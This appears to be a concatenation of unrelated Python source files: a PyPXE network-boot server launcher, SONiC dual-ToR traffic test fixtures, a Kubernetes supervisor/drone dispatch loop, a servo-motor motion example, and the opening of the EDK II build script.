exclusive.add_argument('--dhcp', action = 'store_true', dest = 'USE_DHCP', help = 'Enable built-in DHCP server', default = SETTINGS['USE_DHCP'])
exclusive.add_argument('--dhcp-proxy', action = 'store_true', dest = 'DHCP_MODE_PROXY', help = 'Enable built-in DHCP server in proxy mode (implies --dhcp)', default = SETTINGS['DHCP_MODE_PROXY'])
dhcp_group.add_argument('--dhcp-server-ip', action = 'store', dest = 'DHCP_SERVER_IP', help = 'DHCP Server IP', default = SETTINGS['DHCP_SERVER_IP'])
dhcp_group.add_argument('--dhcp-server-port', action = 'store', dest = 'DHCP_SERVER_PORT', help = 'DHCP Server Port', default = SETTINGS['DHCP_SERVER_PORT'])
dhcp_group.add_argument('--dhcp-begin', action = 'store', dest = 'DHCP_OFFER_BEGIN', help = 'DHCP lease range start', default = SETTINGS['DHCP_OFFER_BEGIN'])
dhcp_group.add_argument('--dhcp-end', action = 'store', dest = 'DHCP_OFFER_END', help = 'DHCP lease range end', default = SETTINGS['DHCP_OFFER_END'])
dhcp_group.add_argument('--dhcp-subnet', action = 'store', dest = 'DHCP_SUBNET', help = 'DHCP lease subnet', default = SETTINGS['DHCP_SUBNET'])
dhcp_group.add_argument('--dhcp-router', action = 'store', dest = 'DHCP_ROUTER', help = 'DHCP lease router', default = SETTINGS['DHCP_ROUTER'])
dhcp_group.add_argument('--dhcp-dns', action = 'store', dest = 'DHCP_DNS', help = 'DHCP lease DNS server', default = SETTINGS['DHCP_DNS'])
dhcp_group.add_argument('--dhcp-broadcast', action = 'store', dest = 'DHCP_BROADCAST', help = 'DHCP broadcast address', default = SETTINGS['DHCP_BROADCAST'])
dhcp_group.add_argument('--dhcp-fileserver', action = 'store', dest = 'DHCP_FILESERVER', help = 'DHCP fileserver IP', default = SETTINGS['DHCP_FILESERVER'])
dhcp_group.add_argument('--dhcp-whitelist', action = 'store_true', dest = 'DHCP_WHITELIST', help = 'Only respond to DHCP clients present in --static-config', default = SETTINGS['DHCP_WHITELIST'])
# HTTP server arguments
http_group = parser.add_argument_group(title = 'HTTP', description = 'Arguments relevant to the HTTP server')
http_group.add_argument('--http-port', action = 'store', dest = 'HTTP_PORT', help = 'HTTP Server Port', default = SETTINGS['HTTP_PORT'])
http_group.add_argument('--http-server-ip', action = 'store', dest = 'HTTP_SERVER_IP', help = 'HTTP Server IP', default = SETTINGS['HTTP_SERVER_IP'])
# network boot directory and file name arguments
parser.add_argument('--netboot-dir', action = 'store', dest = 'NETBOOT_DIR', help = 'Local file serve directory', default = SETTINGS['NETBOOT_DIR'])
parser.add_argument('--netboot-file', action = 'store', dest = 'NETBOOT_FILE', help = 'PXE boot file name (after iPXE if --ipxe)', default = SETTINGS['NETBOOT_FILE'])
# NBD server arguments
nbd_group = parser.add_argument_group(title = 'Network Block Device', description = 'Arguments relevant to the NBD server')
nbd_group.add_argument('--nbd', action = 'store', dest = 'NBD_BLOCK_DEVICE', help = 'Enable the NDB server with a specific block device (Can be a disk image)', default = SETTINGS['NBD_BLOCK_DEVICE'])
nbd_group.add_argument('--nbd-write', action = 'store_true', dest = 'NBD_WRITE', help = 'Enable writes on the NBD device', default = SETTINGS['NBD_WRITE'])
nbd_group.add_argument('--nbd-cow', action = 'store_true', dest = 'NBD_COW', help = 'Enable copy-on-write for the NBD device (Non-persistent changes)', default = SETTINGS['NBD_COW'])
nbd_group.add_argument('--nbd-cow-in-mem', action = 'store_true', dest = 'NBD_COW_IN_MEM', help = 'Store copy-on-write pages in memory', default = SETTINGS['NBD_COW_IN_MEM'])
nbd_group.add_argument('--nbd-copy-to-ram', action = 'store_true', dest = 'NBD_COPY_TO_RAM', help = 'Copy the NBD device to memory before serving clients', default = SETTINGS['NBD_COPY_TO_RAM'])
nbd_group.add_argument('--nbd-server', action = 'store', dest = 'NBD_SERVER_IP', help = 'NBD Server IP', default = SETTINGS['NBD_SERVER_IP'])
nbd_group.add_argument('--nbd-port', action = 'store', dest = 'NBD_PORT', help = 'NBD Server Port', default = SETTINGS['NBD_PORT'])
# TFTP server arguments
tftp_group = parser.add_argument_group(title = 'TFTP', description = 'Arguments relevant to the TFTP server')
tftp_group.add_argument('--tftp-server-ip', action = 'store', dest = 'TFTP_SERVER_IP', help = 'TFTP Server IP', default = SETTINGS['TFTP_SERVER_IP'])
return parser.parse_args()
def do_debug(service):
return ((service in args.MODE_DEBUG.lower()
or 'all' in args.MODE_DEBUG.lower())
and '-{0}'.format(service) not in args.MODE_DEBUG.lower())
def do_verbose(service):
return ((service in args.MODE_VERBOSE.lower()
or 'all' in args.MODE_VERBOSE.lower())
and '-{0}'.format(service) not in args.MODE_VERBOSE.lower())
def main():
global SETTINGS, args
try:
# configure
args = parse_cli_arguments()
if args.DUMP_CONFIG or args.DUMP_CONFIG_MERGED:
if args.DUMP_CONFIG:
settings = SETTINGS
else:
# some arguments don't make sense to print
settings = args.__dict__
del settings['DUMP_CONFIG']
del settings['DUMP_CONFIG_MERGED']
del settings['JSON_CONFIG']
print(json.dumps(settings, sort_keys=True, indent=4))
sys.exit()
if args.JSON_CONFIG: # load from configuration file if specified
try:
config_file = io.open(args.JSON_CONFIG, 'r')
except IOError:
sys.exit('Failed to open {0}'.format(args.JSON_CONFIG))
try:
loaded_config = json.load(config_file)
config_file.close()
except ValueError:
sys.exit('{0} does not contain valid JSON'.format(args.JSON_CONFIG))
for setting in loaded_config:
if type(loaded_config[setting]) is bytes:
loaded_config[setting] = loaded_config[setting].encode('ascii')
SETTINGS.update(loaded_config) # update settings with JSON config
args = parse_cli_arguments() # re-parse, CLI options take precedence
# warn the user that they are starting PyPXE as non-root user
if os.getuid() != 0:
print(sys.stderr, '\nWARNING: Not root. Servers will probably fail to bind.\n')
# ideally this would be in dhcp itself, but the chroot below *probably*
# breaks the ability to open the config file.
if args.STATIC_CONFIG:
try:
static_config = io.open(args.STATIC_CONFIG, 'r')
except IOError:
sys.exit("Failed to open {0}".format(args.STATIC_CONFIG))
try:
loaded_statics = json.load(static_config)
static_config.close()
except ValueError:
sys.exit("{0} does not contain valid json".format(args.STATIC_CONFIG))
else:
loaded_statics = dict()
# setup main logger
sys_logger = logging.getLogger('PyPXE')
if args.SYSLOG_SERVER:
handler = logging.handlers.SysLogHandler(address = (args.SYSLOG_SERVER, int(args.SYSLOG_PORT)))
else:
handler = logging.StreamHandler()
formatter = logging.Formatter('%(asctime)s [%(levelname)s] %(name)s %(message)s')
handler.setFormatter(formatter)
sys_logger.addHandler(handler)
sys_logger.setLevel(logging.INFO)
# pass warning to user regarding starting HTTP server without iPXE
if args.USE_HTTP and not args.USE_IPXE and not args.USE_DHCP:
sys_logger.warning('HTTP selected but iPXE disabled. PXE ROM must support HTTP requests.')
# if the argument was pased to enabled ProxyDHCP then enable the DHCP server
if args.DHCP_MODE_PROXY:
args.USE_DHCP = True
# if the network boot file name was not specified in the argument,
# set it based on what services were enabled/disabled
if args.NETBOOT_FILE == '':
if not args.USE_IPXE:
args.NETBOOT_FILE = 'pxelinux.0'
elif not args.USE_HTTP:
args.NETBOOT_FILE = 'boot.ipxe'
else:
args.NETBOOT_FILE = 'boot.http.ipxe'
if args.NBD_WRITE and not args.NBD_COW:
sys_logger.warning('NBD Write enabled but copy-on-write is not. Multiple clients may cause corruption')
if args.NBD_COW_IN_MEM or args.NBD_COPY_TO_RAM:
sys_logger.warning('NBD cowinmem and copytoram can cause high RAM usage')
if args.NBD_COW and not args.NBD_WRITE:
# cow implies write
args.NBD_WRITE = True
# make a list of running threads for each service
running_services = []
# configure/start TFTP server
if args.USE_TFTP:
# setup TFTP logger
tftp_logger = helpers.get_child_logger(sys_logger, 'TFTP')
sys_logger.info('Starting TFTP server...')
# setup the thread
tftp_server = tftp.TFTPD(
mode_debug = do_debug('tftp'),
mode_verbose = do_verbose('tftp'),
logger = tftp_logger,
netboot_directory = args.NETBOOT_DIR,
ip = args.TFTP_SERVER_IP)
tftpd = threading.Thread(target = tftp_server.listen)
tftpd.daemon = True
tftpd.start()
running_services.append(tftpd)
# configure/start DHCP server
if args.USE_DHCP:
# setup DHCP logger
dhcp_logger = helpers.get_child_logger(sys_logger, 'DHCP')
if args.DHCP_MODE_PROXY:
sys_logger.info('Starting DHCP server in ProxyDHCP mode...')
else:
sys_logger.info('Starting DHCP server...')
# setup the thread
dhcp_server = dhcp.DHCPD(
ip = args.DHCP_SERVER_IP,
port = args.DHCP_SERVER_PORT,
offer_from = args.DHCP_OFFER_BEGIN,
offer_to = args.DHCP_OFFER_END,
subnet_mask = args.DHCP_SUBNET,
router = args.DHCP_ROUTER,
dns_server = args.DHCP_DNS,
broadcast = args.DHCP_BROADCAST,
file_server = args.DHCP_FILESERVER,
file_name = args.NETBOOT_FILE,
use_ipxe = args.USE_IPXE,
use_http = args.USE_HTTP,
mode_proxy = args.DHCP_MODE_PROXY,
mode_debug = do_debug('dhcp'),
mode_verbose = do_verbose('dhcp'),
whitelist = args.DHCP_WHITELIST,
static_config = loaded_statics,
logger = dhcp_logger,
saveleases = args.LEASES_FILE)
dhcpd = threading.Thread(target = dhcp_server.listen)
dhcpd.daemon = True
dhcpd.start()
running_services.append(dhcpd)
# configure/start HTTP server
if args.USE_HTTP:
# setup HTTP logger
http_logger = helpers.get_child_logger(sys_logger, 'HTTP')
sys_logger.info('Starting HTTP server...')
# setup the thread
http_server = http.HTTPD(
mode_debug = do_debug('http'),
mode_verbose = do_verbose('http'),
logger = http_logger,
port = args.HTTP_PORT,
netboot_directory = args.NETBOOT_DIR,
ip = args.HTTP_SERVER_IP)
httpd = threading.Thread(target = http_server.listen)
httpd.daemon = True
httpd.start()
running_services.append(httpd)
# configure/start NBD server
if args.NBD_BLOCK_DEVICE:
# setup NBD logger
nbd_logger = helpers.get_child_logger(sys_logger, 'NBD')
sys_logger.info('Starting NBD server...')
nbd_server = nbd.NBD(
block_device = args.NBD_BLOCK_DEVICE,
write = args.NBD_WRITE,
cow = args.NBD_COW,
in_mem = args.NBD_COW_IN_MEM,
copy_to_ram = args.NBD_COPY_TO_RAM,
ip = args.NBD_SERVER_IP,
port = args.NBD_PORT,
mode_debug = do_debug('nbd'),
mode_verbose = do_verbose('nbd'),
logger = nbd_logger,
netboot_directory = args.NETBOOT_DIR)
nbdd = threading.Thread(target = nbd_server.listen)
nbdd.daemon = True
nbdd.start()
running_services.append(nbdd)
sys_logger.info('PyPXE successfully initialized and running!')
while all(map(lambda x: x.is_alive(), running_services)):
sleep(1)
except KeyboardInterrupt:
sys.exit('\nShutting down PyPXE...\n')
if __name__ == '__main__':
main()
|
data_plane_utils.py | import pytest
from tests.common.dualtor.dual_tor_io import DualTorIO
from tests.common.helpers.assertions import pytest_assert
import threading
import logging
logger = logging.getLogger(__name__)
def arp_setup(ptfhost):
logger.info('Copy ARP responder to the PTF container {}'.format(ptfhost.hostname))
ptfhost.copy(src='scripts/arp_responder.py', dest='/opt')
ptfhost.host.options["variable_manager"].extra_vars.update({"arp_responder_args": "-e"})
ptfhost.template(src="templates/arp_responder.conf.j2",
dest="/etc/supervisor/conf.d/arp_responder.conf")
logging.info("Refreshing supervisorctl")
ptfhost.shell("supervisorctl reread && supervisorctl update")
def validate_IO_results(tor_IO, allowed_disruption, delay):
received_counter = tor_IO.get_total_received_packets()
total_disruptions = tor_IO.get_total_disruptions()
longest_disruption = tor_IO.get_longest_disruption()
total_lost_packets = tor_IO.get_total_dropped_packets()
if received_counter:
pytest_assert(total_disruptions <= 1, "Traffic was disrupted {} times. Allowed number of disruption: {}"\
.format(total_disruptions, allowed_disruption))
pytest_assert(longest_disruption <= delay, "Traffic was disrupted for {}s. Maximum allowed disruption: {}s".\
format(longest_disruption, delay))
else:
pytest_assert(received_counter > 0, "Test failed to capture any meaningful received packet")
if total_lost_packets:
logging.warn("Packets were lost during the test. Total lost count: {}".format(total_lost_packets))
@pytest.fixture
def send_t1_to_server_after_action(ptfhost, ptfadapter, tbinfo):
"""
Starts IO test from T1 router to server.
As part of IO test the background thread sends and sniffs packets.
As soon as sender and sniffer threads are in running state, a callback action is performed.
When action is finished, the sender and sniffer threads are given time to complete.
Finally, the collected packets are sniffed, and the disruptions are measured.
As part of teardown, the ARP table is cleared and ptf dataplane is flushed.
Args:
ptfhost (fixture): Fixture for PTF instance to be used during the test
ptfadapter (fixture): Fixture which provides helper utility to use ptf ptf testutils
tbinfo (fixture): Fixture for testebd inventory information
Yields:
function: A helper function to run and monitor the IO test
"""
arp_setup(ptfhost)
duthosts = []
def t1_to_server_io_test(duthost, server_port=None, tor_port=None, delay=1, timeout=5, action=None):
"""
Helper method for `send_t1_to_server_after_action`.
Starts sender and sniffer before performing the action on the tor host.
Args:
server_port: The port intended to receive the packet
tor_port: The T1 port through which to send the packet. Connected to either the upper or lower ToR.
default - None. If set to None, the test chooses random portchannel member port for this test.
delay: Maximum acceptable delay for traffic to continue flowing again
timeout: Time to wait for packet to be transmitted
action: Some function (with args) which performs the desired action, or `None` if no action/delay is desired
"""
duthosts.append(duthost)
io_ready = threading.Event()
tor_IO = DualTorIO(duthost, ptfhost, ptfadapter, tbinfo, server_port, tor_port, delay, timeout, io_ready)
send_and_sniff = threading.Thread(target=tor_IO.start_io_test, kwargs={'traffic_generator': tor_IO.generate_from_t1_to_server})
send_and_sniff.start()
if action:
# do not perform the provided action until IO threads (sender and sniffer) are ready
io_ready.wait()
logger.info("Sender and sniffer threads started, ready to execute the callback action")
action()
# Wait for the IO to complete before doing checks
logger.info("Waiting for sender and sniffer threads to finish..")
send_and_sniff.join()
validate_IO_results(tor_IO, allowed_disruption=1, delay=delay)
yield t1_to_server_io_test
# cleanup torIO
ptfadapter.dataplane.flush()
for duthost in duthosts:
logger.info('Clearing arp entries on DUT {}'.format(duthost.hostname))
duthost.shell('sonic-clear arp')
@pytest.fixture
def send_server_to_t1_after_action(ptfhost, ptfadapter, tbinfo):
"""
Starts IO test from server to T1 router.
As part of IO test the background thread sends and sniffs packets.
As soon as sender and sniffer threads are in running state, a callback action is performed.
When action is finished, the sender and sniffer threads are given time to complete.
Finally, the collected packets are sniffed, and the disruptions are measured.
As part of teardown, the ARP, FDB tables are cleared and ptf dataplane is flushed.
Args:
ptfhost (fixture): Fixture for PTF instance to be used during the test
ptfadapter (fixture): Fixture which provides helper utility to use ptf testutils
tbinfo (fixture): Fixture for testebd inventory information
Yields:
function: A helper function to run and monitor the IO test
"""
arp_setup(ptfhost)
duthosts = []
def server_to_t1_io_test(duthost, server_port=None, tor_port=None, delay=1, timeout=5, action=None):
"""
Helper method for `send_server_to_t1_after_action`.
Starts sender and sniffer before performing the action on the tor host.
Args:
server_port: The port intended to receive the packet
tor_port: The port through which to send the packet. Connected to either the upper or lower ToR.
default - None. If set to None, the test chooses random portchannel member port for this test.
delay: Maximum acceptable delay for traffic to continue flowing again
timeout: Time to wait for packet to be transmitted
action: Some function (with args) which performs the desired action, or `None` if no action/delay is desired
"""
duthosts.append(duthost)
io_ready = threading.Event()
tor_IO = DualTorIO(duthost, ptfhost, ptfadapter, tbinfo, server_port, tor_port, delay, timeout, io_ready)
send_and_sniff = threading.Thread(target=tor_IO.start_io_test, kwargs={'traffic_generator': tor_IO.generate_from_server_to_t1})
send_and_sniff.start()
if action:
# do not perform the provided action until IO threads (sender and sniffer) are ready
io_ready.wait()
logger.info("Sender and sniffer threads started, ready to execute the callback action")
action()
# Wait for the IO to complete before doing checks
send_and_sniff.join()
validate_IO_results(tor_IO, allowed_disruption=1, delay=delay)
yield server_to_t1_io_test
# cleanup torIO
ptfadapter.dataplane.flush()
for duthost in duthosts:
logger.info('Clearing arp entries on DUT {}'.format(duthost.hostname))
duthost.shell('sonic-clear arp')
|
k8.py |
import logging, coloredlogs
logger = logging.getLogger(__name__)
coloredlogs.install(level='DEBUG',logger=logger)
coloredlogs.install(level='DEBUG',logger=logging.getLogger('pbt'))
coloredlogs.install(level='DEBUG',logger=logging.getLogger('experiment'))
import requests
import json
import platform
import time
import pika
import threading
import traceback
from .helpers import *
def i_am_supervisor(args):
try:
res = requests.get("http://localhost:4040")
except requests.exceptions.ConnectionError:
logger.warning("Could not contact leadership election sidecar, assuming not leader")
return False
if(res.ok):
data = json.loads(res.content)
leader_name = data["name"]
my_name = platform.node()
return leader_name == my_name
else:
res.raise_for_status()
def i_am_drone(args):
am_sup = i_am_supervisor(args)
am_drone = not am_sup or args.master_works
return am_drone
# --------------------------------------------------------------------------
# Thread work loops
# --------------------------------------------------------------------------
def do_drone(args):
drone = None
try:
while True:
am_drone = i_am_drone(args)
if am_drone and drone is None:
logger.info("Start drone")
drone = get_drone(args)
elif not am_drone and drone is not None:
logger.info("Stop drone")
drone.close()
drone = None
if drone is not None:
drone.run_epoch()
time.sleep(args.sleep_per_cycle)
# TODO: actual signalling
except KeyboardInterrupt:
if drone is not None:
drone.close()
except Exception as e:
traceback.print_exc()
raise e
def do_supervisor(args):
sup = None
try:
while True:
am_sup = i_am_supervisor(args)
if am_sup and sup is None:
logger.info("Start supervisor")
sup = get_supervisor(args)
elif not am_sup and sup is not None:
logger.info("Stop supervisor")
sup.close()
sup = None
if sup is not None:
sup.run_epoch()
time.sleep(args.sleep_per_cycle)
# TODO: actual signalling
except KeyboardInterrupt:
if sup is not None:
sup.close()
except Exception as e:
traceback.print_exc()
raise e
# --------------------------------------------------------------------------
# Dispatch threads from main loop
# --------------------------------------------------------------------------
def run_main_dispatch(args):
my_sup = None
my_drones = { k:None for k in range(args.n_drones) }
try:
while True:
if my_sup is None or not my_sup.isAlive():
logger.debug("Dispatch supervisor thread")
my_sup = threading.Thread(target=do_supervisor, args=(args,))
my_sup.setDaemon(True)
my_sup.start()
for key, drone in my_drones.items():
if drone is None or not drone.isAlive():
logger.debug("Dispatch drone thread")
t = threading.Thread(target=do_drone, args=(args,))
t.setDaemon(True)
t.start()
my_drones[key] = t
time.sleep(args.sleep_per_cycle)
except KeyboardInterrupt:
# do something to signal to threads
pass
if __name__ == "__main__":
args = get_args()
run_main_dispatch(args)
|
basic_motion.py | import ingenialink as il
import numpy as np
import argparse
from time import sleep
import threading
CSV_MODE = 35
CSP_MODE = 36
stop_thread = False
sampling_time = 0.1
def read_thread(servo, actual_val_reg_id):
global stop_thread
while not stop_thread:
print("Actual value: ", servo.read(actual_val_reg_id))
def slave_connection(ip):
servo = None
try:
_, servo = il.lucky(il.NET_PROT.ETH, "eve-xcr_1.5.2.xdf", address_ip=ip, port_ip=1061)
except:
print("There was an error while scanning the network")
return servo
def basic_motion(args):
servo = slave_connection(args.ip)
if servo is None:
print("Cannot find any slave connected.")
return -1
else:
print("Slave found!")
# Obtain arguments
if args.op == 'CSV':
op_mode = CSV_MODE
target_reg_id = 'CL_VEL_SET_POINT_VALUE'
actual_val_reg_id = 'FBK_CUR_MODULE_VALUE'
multiplier = 10
else:
op_mode = CSP_MODE
target_reg_id = 'CL_POS_SET_POINT_VALUE'
actual_val_reg_id = 'CL_POS_FBK_VALUE'
multiplier = 1000
# Set Operation Mode
servo.write('DRV_OP_CMD', op_mode)
# Generate an slow sine wave of 10 seconds
time = np.arange(0, 10, sampling_time)
amplitude = np.sin(time)
print("Amplitude: ", amplitude)
# Enable motor
try:
servo.enable()
except:
print("Cannot enable the motor")
return -2
# Start reading thread
thread = threading.Thread(target=read_thread, args=(servo, actual_val_reg_id))
thread.start()
# Send the generated targets
for value in amplitude:
print("Target demanded: ", value*multiplier)
servo.write(target_reg_id, int(value*multiplier))
sleep(sampling_time)
# Stop the reading thread
global stop_thread
stop_thread = True
thread.join()
# Disable motor
try:
servo.disable()
except:
print("Cannot disable the motor")
return -2
return 0
if __name__ == '__main__':
# Usage
parser = argparse.ArgumentParser(description='Basic Motion Application.')
parser.add_argument('--ip', metavar="", type=str, help='the ip of the drive. 192.168.2.22 by default',
default='192.168.2.22')
parser.add_argument('--op', metavar="", type=str, help='Operation mode to use [CSP, CSV]',
default='CSP')
args = parser.parse_args()
basic_motion(args) |
build.py | ## @file
# build a platform or a module
#
# Copyright (c) 2014, Hewlett-Packard Development Company, L.P.<BR>
# Copyright (c) 2007 - 2021, Intel Corporation. All rights reserved.<BR>
# Copyright (c) 2018, Hewlett Packard Enterprise Development, L.P.<BR>
# Copyright (c) 2020 - 2021, ARM Limited. All rights reserved.<BR>
#
# SPDX-License-Identifier: BSD-2-Clause-Patent
#
##
# Import Modules
#
from __future__ import print_function
from __future__ import absolute_import
import os.path as path
import sys
import os
import re
import glob
import time
import platform
import traceback
import multiprocessing
from threading import Thread,Event,BoundedSemaphore
import threading
from linecache import getlines
from subprocess import Popen,PIPE, STDOUT
from collections import OrderedDict, defaultdict
from AutoGen.PlatformAutoGen import PlatformAutoGen
from AutoGen.ModuleAutoGen import ModuleAutoGen
from AutoGen.WorkspaceAutoGen import WorkspaceAutoGen
from AutoGen.AutoGenWorker import AutoGenWorkerInProcess,AutoGenManager,\
LogAgent
from AutoGen import GenMake
from Common import Misc as Utils
from Common.TargetTxtClassObject import TargetTxtDict
from Common.ToolDefClassObject import ToolDefDict
from buildoptions import MyOptionParser
from Common.Misc import PathClass,SaveFileOnChange,RemoveDirectory
from Common.StringUtils import NormPath
from Common.MultipleWorkspace import MultipleWorkspace as mws
from Common.BuildToolError import *
from Common.DataType import *
import Common.EdkLogger as EdkLogger
from Workspace.WorkspaceDatabase import BuildDB
from BuildReport import BuildReport
from GenPatchPcdTable.GenPatchPcdTable import PeImageClass,parsePcdInfoFromMapFile
from PatchPcdValue.PatchPcdValue import PatchBinaryFile
import Common.GlobalData as GlobalData
from GenFds.GenFds import GenFds, GenFdsApi
import multiprocessing as mp
from multiprocessing import Manager
from AutoGen.DataPipe import MemoryDataPipe
from AutoGen.ModuleAutoGenHelper import WorkSpaceInfo, PlatformInfo
from GenFds.FdfParser import FdfParser
from AutoGen.IncludesAutoGen import IncludesAutoGen
from GenFds.GenFds import resetFdsGlobalVariable
from AutoGen.AutoGen import CalculatePriorityValue
## standard targets of build command
gSupportedTarget = ['all', 'genc', 'genmake', 'modules', 'libraries', 'fds', 'clean', 'cleanall', 'cleanlib', 'run']
TemporaryTablePattern = re.compile(r'^_\d+_\d+_[a-fA-F0-9]+$')
TmpTableDict = {}
## Check environment PATH variable to make sure the specified tool is found
#
# If the tool is found in the PATH, then True is returned
# Otherwise, False is returned
#
def IsToolInPath(tool):
if 'PATHEXT' in os.environ:
extns = os.environ['PATHEXT'].split(os.path.pathsep)
else:
extns = ('',)
for pathDir in os.environ['PATH'].split(os.path.pathsep):
for ext in extns:
if os.path.exists(os.path.join(pathDir, tool + ext)):
return True
return False
## Check environment variables
#
# Check environment variables that must be set for build. Currently they are
#
# WORKSPACE The directory all packages/platforms start from
# EDK_TOOLS_PATH The directory contains all tools needed by the build
# PATH $(EDK_TOOLS_PATH)/Bin/<sys> must be set in PATH
#
# If any of above environment variable is not set or has error, the build
# will be broken.
#
def CheckEnvVariable():
# check WORKSPACE
if "WORKSPACE" not in os.environ:
EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
ExtraData="WORKSPACE")
WorkspaceDir = os.path.normcase(os.path.normpath(os.environ["WORKSPACE"]))
if not os.path.exists(WorkspaceDir):
EdkLogger.error("build", FILE_NOT_FOUND, "WORKSPACE doesn't exist", ExtraData=WorkspaceDir)
elif ' ' in WorkspaceDir:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in WORKSPACE path",
ExtraData=WorkspaceDir)
os.environ["WORKSPACE"] = WorkspaceDir
# set multiple workspace
PackagesPath = os.getenv("PACKAGES_PATH")
mws.setWs(WorkspaceDir, PackagesPath)
if mws.PACKAGES_PATH:
for Path in mws.PACKAGES_PATH:
if not os.path.exists(Path):
EdkLogger.error("build", FILE_NOT_FOUND, "One Path in PACKAGES_PATH doesn't exist", ExtraData=Path)
elif ' ' in Path:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in PACKAGES_PATH", ExtraData=Path)
os.environ["EDK_TOOLS_PATH"] = os.path.normcase(os.environ["EDK_TOOLS_PATH"])
# check EDK_TOOLS_PATH
if "EDK_TOOLS_PATH" not in os.environ:
EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
ExtraData="EDK_TOOLS_PATH")
# check PATH
if "PATH" not in os.environ:
EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
ExtraData="PATH")
GlobalData.gWorkspace = WorkspaceDir
GlobalData.gGlobalDefines["WORKSPACE"] = WorkspaceDir
GlobalData.gGlobalDefines["EDK_TOOLS_PATH"] = os.environ["EDK_TOOLS_PATH"]
## Get normalized file path
#
# Convert the path to be local format, and remove the WORKSPACE path at the
# beginning if the file path is given in full path.
#
# @param FilePath File path to be normalized
# @param Workspace Workspace path which the FilePath will be checked against
#
# @retval string The normalized file path
#
def NormFile(FilePath, Workspace):
# check if the path is absolute or relative
if os.path.isabs(FilePath):
FileFullPath = os.path.normpath(FilePath)
else:
FileFullPath = os.path.normpath(mws.join(Workspace, FilePath))
Workspace = mws.getWs(Workspace, FilePath)
# check if the file path exists or not
if not os.path.isfile(FileFullPath):
EdkLogger.error("build", FILE_NOT_FOUND, ExtraData="\t%s (Please give file in absolute path or relative to WORKSPACE)" % FileFullPath)
# remove workspace directory from the beginning part of the file path
if Workspace[-1] in ["\\", "/"]:
return FileFullPath[len(Workspace):]
else:
return FileFullPath[(len(Workspace) + 1):]
## Get the output of an external program
#
# This is the entrance method of thread reading output of an external program and
# putting them in STDOUT/STDERR of current program.
#
# @param From The stream message read from
# @param To The stream message put on
# @param ExitFlag The flag used to indicate stopping reading
#
def ReadMessage(From, To, ExitFlag,MemTo=None):
while True:
# read one line a time
Line = From.readline()
# empty string means "end"
if Line is not None and Line != b"":
LineStr = Line.rstrip().decode(encoding='utf-8', errors='ignore')
if MemTo is not None:
if "Note: including file:" == LineStr.lstrip()[:21]:
MemTo.append(LineStr)
else:
To(LineStr)
MemTo.append(LineStr)
else:
To(LineStr)
else:
break
if ExitFlag.is_set():
break
class MakeSubProc(Popen):
def __init__(self,*args, **argv):
super(MakeSubProc,self).__init__(*args, **argv)
self.ProcOut = []
## Launch an external program
#
# This method will call subprocess.Popen to execute an external program with
# given options in specified directory. Because of the dead-lock issue during
# redirecting output of the external program, threads are used to to do the
# redirection work.
#
# @param Command A list or string containing the call of the program
# @param WorkingDir The directory in which the program will be running
#
def LaunchCommand(Command, WorkingDir,ModuleAuto = None):
BeginTime = time.time()
# if working directory doesn't exist, Popen() will raise an exception
if not os.path.isdir(WorkingDir):
EdkLogger.error("build", FILE_NOT_FOUND, ExtraData=WorkingDir)
# Command is used as the first Argument in following Popen().
# It could be a string or sequence. We find that if command is a string in following Popen(),
# ubuntu may fail with an error message that the command is not found.
# So here we may need convert command from string to list instance.
if platform.system() != 'Windows':
if not isinstance(Command, list):
Command = Command.split()
Command = ' '.join(Command)
Proc = None
EndOfProcedure = None
try:
# launch the command
Proc = MakeSubProc(Command, stdout=PIPE, stderr=STDOUT, env=os.environ, cwd=WorkingDir, bufsize=-1, shell=True)
# launch two threads to read the STDOUT and STDERR
EndOfProcedure = Event()
EndOfProcedure.clear()
if Proc.stdout:
StdOutThread = Thread(target=ReadMessage, args=(Proc.stdout, EdkLogger.info, EndOfProcedure,Proc.ProcOut))
StdOutThread.name = "STDOUT-Redirector"
StdOutThread.daemon = False
StdOutThread.start()
# waiting for program exit
Proc.wait()
except: # in case of aborting
# terminate the threads redirecting the program output
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
if EndOfProcedure is not None:
EndOfProcedure.set()
if Proc is None:
if not isinstance(Command, type("")):
Command = " ".join(Command)
EdkLogger.error("build", COMMAND_FAILURE, "Failed to start command", ExtraData="%s [%s]" % (Command, WorkingDir))
if Proc.stdout:
StdOutThread.join()
# MU_CHANGE begin
# # check the return code of the program
# if Proc.returncode != 0:
# if not isinstance(Command, type("")):
# Command = " ".join(Command)
# # print out the Response file and its content when make failure
# RespFile = os.path.join(WorkingDir, 'OUTPUT', 'respfilelist.txt')
# if os.path.isfile(RespFile):
# f = open(RespFile)
# RespContent = f.read()
# f.close()
# EdkLogger.info(RespContent)
# EdkLogger.error("build", COMMAND_FAILURE, ExtraData="%s [%s]" % (Command, WorkingDir))
RespFile = os.path.join(WorkingDir, 'OUTPUT', 'respfilelist.txt')
if os.path.isfile(RespFile):
f = open(RespFile)
RespContent = f.read().splitlines()
f.close()
EdkLogger.info("Built with Respfile ... %s", WorkingDir)
for i in range(0, len(RespContent), 2):
cmd = RespContent[i]
cmd = cmd[cmd.find("OUTPUT")+7 : cmd.find("_resp.txt")]
flags = RespContent[i+1]
EdkLogger.info(" \"%s_FLAGS\" : %s" % (cmd.upper(), flags))
if Proc.returncode != 0:
Command = " ".join(Command)
EdkLogger.error("build", COMMAND_FAILURE, ExtraData="%s [%s]" % (Command, WorkingDir))
# MU_CHANGE end
if ModuleAuto:
iau = IncludesAutoGen(WorkingDir,ModuleAuto)
if ModuleAuto.ToolChainFamily == TAB_COMPILER_MSFT:
iau.CreateDepsFileForMsvc(Proc.ProcOut)
else:
iau.UpdateDepsFileforNonMsvc()
iau.UpdateDepsFileforTrim()
iau.CreateModuleDeps()
iau.CreateDepsInclude()
iau.CreateDepsTarget()
return "%dms" % (int(round((time.time() - BeginTime) * 1000)))
## The smallest unit that can be built in multi-thread build mode
#
# This is the base class of build unit. The "Obj" parameter must provide
# __str__(), __eq__() and __hash__() methods. Otherwise there could be build units
# missing build.
#
# Currently the "Obj" should be only ModuleAutoGen or PlatformAutoGen objects.
#
class BuildUnit:
## The constructor
#
# @param self The object pointer
# @param Obj The object the build is working on
# @param Target The build target name, one of gSupportedTarget
